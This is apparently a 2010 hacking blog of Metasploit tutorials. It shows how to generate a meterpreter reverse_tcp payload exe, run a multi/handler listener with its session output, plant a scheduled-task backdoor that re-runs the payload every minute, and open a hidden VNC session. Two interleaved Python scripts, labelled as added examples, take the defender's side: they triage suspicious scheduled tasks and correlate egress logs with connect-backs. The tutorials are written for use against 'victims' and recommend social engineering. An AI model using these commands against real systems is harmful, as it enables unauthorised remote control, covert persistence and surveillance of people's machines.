Monday 29 November 2010

What Video Tutorials Would You Like to See?

Just leave a comment below with the topics you would like me to cover.

Looking forward to some comments :)

Sunday 28 November 2010

HOW TO: Metasploit Meterpreter as a Backdoor

This tutorial covers making a backdoor on the victim's system which we can use to reconnect to it later if we wish to.

For this we will be using the scheduleme command, but for it to work properly on Windows Vista and Windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering.
The meterpreter session will run under the user ID of the current user. Then use the "use privs" command to get better privileges and more options; typing "help" will then list most of the available commands for you to use.
The "use privs" command might have been taken out in newer versions of Metasploit; I think it now loads automatically. Just try it out, and I'll get back to you on this.

Using the scheduleme command
Running the command below will show you all the available options:

>"run scheduleme -h"

The command I use is below:
>"run scheduleme -m -1 -u -e /root/exploit.exe"

Breakdown of the command:

The -m option specifies how often the scheduled task will run, so I used "-m -1" so that it is started every 1 minute.
The -u option gives the user name of the account with admin privs.
The -e option is the exe you want to upload to the victim and use as your backdoor. Mine is in the root directory, so -e /root/exploit.exe is my option.

Now that it has been uploaded, exit the meterpreter session, start the listener again and wait a minute for a connection... watch the video!

NOTE: The EXE which is uploaded must obviously be configured to connect back to you, and you create this exe just like all the others.
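The persistence mechanism above is a scheduled task that re-runs an uploaded exe every minute. From the other side of the fence, that same pattern is what a host review should look for. The Python script below is an added example for this post, not code from the original post or from Metasploit: it reads a scheduled-task export in the shape of a verbose `schtasks /query /fo CSV /v` listing (only a subset of that command's columns is used here, and the rows are constructed for the example) and flags tasks that repeat on a short interval and run a binary from a user-writable or otherwise untrusted location. The trusted-root and writable-directory lists are assumptions you would tune for your own estate.

```python
"""Triage scheduled tasks for short-interval persistence.

Added example (not from the original post). Column names follow the verbose
`schtasks /query /fo CSV /v` export; the sample rows below are constructed.
"""
import csv
import io
import re

# Constructed sample: a simplified subset of the verbose schtasks CSV columns.
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"\syscheck","C:\Windows\Temp\exploit.exe","Administrator","One Time Only, Minute","0:01:00"
"\Adobe Acrobat Update Task","""C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"" /q","SYSTEM","Daily","N/A"
"\Updater","C:\Users\alice\AppData\Local\Temp\svc.exe","alice","Hourly","1:00:00"
'''

# Assumed policy: binaries under these roots are considered trusted...
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files", "%windir%", "%systemroot%", "%programfiles%")
# ...unless the path also passes through a directory ordinary users can write to.
WRITABLE_MARKERS = ("\\temp\\", "\\appdata\\", "\\users\\", "\\programdata\\", "\\public\\")
SHORT_INTERVAL_MINUTES = 5


def executable_path(task_to_run):
    """Return the program portion of a 'Task To Run' value, dropping any arguments."""
    m = re.match(r'^"([^"]+)"|^(\S+)', task_to_run.strip())
    return (m.group(1) or m.group(2)) if m else task_to_run.strip()


def interval_minutes(repeat_every):
    """Convert schtasks' H:MM:SS repeat value to minutes; None when the task does not repeat."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", repeat_every.strip())
    if not m:
        return None
    hours, minutes, seconds = (int(x) for x in m.groups())
    return hours * 60 + minutes + seconds / 60


def path_is_untrusted(path):
    """True if the binary lives in a writable directory or outside the trusted roots."""
    p = path.lower()
    return any(marker in p for marker in WRITABLE_MARKERS) or not p.startswith(TRUSTED_ROOTS)


def triage_tasks(csv_text):
    """Return findings for tasks that run an untrusted binary; short repeat intervals rank high."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        exe = executable_path(row["Task To Run"])
        minutes = interval_minutes(row["Repeat: Every"])
        if not path_is_untrusted(exe):
            continue
        severity = "high" if minutes is not None and minutes <= SHORT_INTERVAL_MINUTES else "medium"
        findings.append({
            "task": row["TaskName"],
            "exe": exe,
            "user": row["Run As User"],
            "every_minutes": minutes,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in triage_tasks(SAMPLE_CSV):
        print(finding["severity"].upper(), finding["task"], "->", finding["exe"],
              "as", finding["user"], "every", finding["every_minutes"], "min")
```

Run against a real export, the task that repeats every minute from a temp directory is the one that surfaces first; a daily task from Program Files does not appear at all, which keeps the output short enough to read by hand.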

Saturday 27 November 2010

How To Get a VNC Session Inside a Meterpreter Session While Still Having Access To The Meterpreter Command Line

If you didn't know what VNC was, it's remote control software which lets you see and interact with desktop applications across any network.

In Metasploit there is a .rb script that allows you to control a remote computer like VNC; it is located at /opt/metasploit3/msf3/scripts/meterpreter/ and called vnc.rb. This script is all well and good, but it just creates a VNC session and that's it. It doesn't give you the option to carry on using Meterpreter, so I came across a script which allows you to still use Meterpreter in the background, which is useful when you still want to do background operations like uploading and downloading, edits to the registry, etc.


In the video:

I explain how to create the script and use it.
You can download the script from HERE (it's in .txt format).
Then, using nano, which is a console-based text editor installed in BackTrack, I create the scripts in the /opt/metasploit3/msf3/scripts/meterpreter/ location and give them the file extension .rb, which is a Ruby file.


Watch the video if unsure!


But there is a problem with this script if you want to be more hidden. The script spawns a command shell prompt on the victim's screen in plain sight. To get around this I modify the file to include this line:




mul.datastore['DisableCourtesyShell'] = true


Watch the video to see where to place it in the file.


To run the script from meterpreter just type "run <filename.rb>". A VNC screen is then created and you can control the remote machine, but if you go back to your meterpreter session and hit Enter a few times you will still have your command line with full access :)
This is a great book for learning the Metasploit framework!
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research

Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance

In this video I show you how to make a basic reverse TCP payload in Metasploit's Meterpreter program.


A bit of info on the Metasploit Project:


"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/


This program is available for Windows and Linux (I tried using it on Windows and hated it) and is updated about daily.
It's one of the best free programs for pentesting/exploiting.


In the video I show you how to use the program in Linux; if you use it in Windows the commands could be slightly different.



In the video:


I show you how to make a basic reverse_tcp payload. Open the client and use this command: " ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip address> LPORT=<your listening port> x > /root/<filename.exe> "


Explanation: 


LHOST is the address which you want your exe to connect back to; this can be an internal or external IP. To find your internal IP in Linux just open a terminal and type "ifconfig" and you shall see it.


LPORT is the port you want your exe to connect back to you on, so make sure it's forwarded properly.


The part " x > /root/<filename.exe> " is basically saying create an exe (" x ") and send it to " > /root/filename.exe ", which is your root folder on Linux. This exe will only work on Windows; the same kind of exploits exist for other OSes, but as Windows is the most common I will use this.


So an example would be this:
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "


There are extra commands which will encode your exe to help bypass AV (antivirus), but I will cover them in a later post, as this is intended as a very basic, first-glance look at it and how it works.


Next, copy the exe you just created to the victim box. If you haven't noticed, I use virtual machines running BackTrack 4 and XP Pro.


So now we need to open a listener so we can listen for the exe connecting back, so that we get a session.


Open Metasploit Console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"



msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
So now we have a listening server running, waiting for the connect-back.
Remember to make LHOST and LPORT your own configuration.


When the exe is clicked and activated you should get the connection, and it will look like this:

msf exploit(handler) > exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
 
meterpreter >


Now we have a meterpreter session and have full access :)
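The handler transcript above records every new session as "handler ip:port -> victim ip:port", and the same connection shows up in reverse on the victim's network as an outbound TCP connection from a workstation to a port nobody normally talks to. The Python script below is an added example for this post, not code from the original post or from Metasploit: it parses the "Meterpreter session ... opened" line in the format shown above, scans a constructed egress log for workstation connections to ports outside an expected-egress list, and correlates the two views by their 4-tuple. The egress log format (timestamp ACTION PROTO src:port -> dst:port), the expected-port list and the 192.168.1.0/24 workstation subnet are assumptions made for the example.

```python
"""Defender-side view of a reverse TCP connect-back.

Added example (not from the original post). The session line format is the one
printed by the handler in the transcript above; the egress log lines are constructed.
"""
import ipaddress
import re

# Matches: [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
SESSION_RE = re.compile(
    r"Meterpreter session (\d+) opened \((\S+):(\d+) -> (\S+):(\d+)\)")

# Constructed egress log (assumed format: timestamp ACTION PROTO src:port -> dst:port).
EGRESS_LOG = """\
2010-11-27T14:01:58 ALLOW TCP 192.168.1.2:1059 -> 74.125.39.99:443
2010-11-27T14:02:11 ALLOW TCP 192.168.1.2:1060 -> 192.168.1.1:4444
2010-11-27T14:02:40 ALLOW UDP 192.168.1.2:1061 -> 192.168.1.254:53
2010-11-27T14:03:05 ALLOW TCP 192.168.1.7:49213 -> 10.0.0.5:8080
"""
LOG_RE = re.compile(r"^(\S+) (\w+) (TCP|UDP) (\S+):(\d+) -> (\S+):(\d+)$")

# Assumed policy: ports a workstation is expected to reach directly; everything else is reviewed.
EXPECTED_PORTS = {25, 53, 80, 443, 587, 993}
WORKSTATIONS = ipaddress.ip_network("192.168.1.0/24")  # assumed client subnet


def parse_session_line(line):
    """Extract session id, handler endpoint and victim endpoint from a handler log line."""
    m = SESSION_RE.search(line)
    if not m:
        return None
    sid, h_ip, h_port, v_ip, v_port = m.groups()
    return {"session": int(sid),
            "handler": (h_ip, int(h_port)),
            "victim": (v_ip, int(v_port))}


def unexpected_egress(log_text):
    """Return workstation connections whose destination port is not on the expected list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, action, proto, src, sport, dst, dport = m.groups()
        if ipaddress.ip_address(src) in WORKSTATIONS and int(dport) not in EXPECTED_PORTS:
            hits.append({"time": ts, "action": action, "proto": proto,
                         "src": src, "sport": int(sport),
                         "dst": dst, "dport": int(dport)})
    return hits


def correlate(session, hits):
    """Keep the egress hits whose 4-tuple matches the handler's record of the session."""
    return [h for h in hits
            if (h["src"], h["sport"]) == session["victim"]
            and (h["dst"], h["dport"]) == session["handler"]]


if __name__ == "__main__":
    session = parse_session_line(
        "[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)")
    hits = unexpected_egress(EGRESS_LOG)
    for h in hits:
        print("review:", h)
    for h in correlate(session, hits):
        print("matches session %d:" % session["session"], h)
```

The port heuristic on its own flags more than the one connection (the 8080 line is a second candidate), which is the point of the correlation step: given the handler's own record of the session, the matching 4-tuple in the egress log pins down exactly which host and ephemeral port made the connect-back and when. On a network that only permits outbound traffic through a proxy on the expected ports, the 4444 line would never have been an ALLOW in the first place.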


New Security Blog!!

Because of the good amount of interest in my YouTube videos I have decided to create a blog to help explain my videos, which will help you, the viewer. As well as posting my videos here I will also be giving you extra security updates and tips.


This will also be a place where you can ask questions etc. I will keep this blog updated regularly and will respond as quickly as possible.


Oh, and please tell me what you think of the blog. If I'm missing anything, or you want to suggest something that might improve it, then please feel free.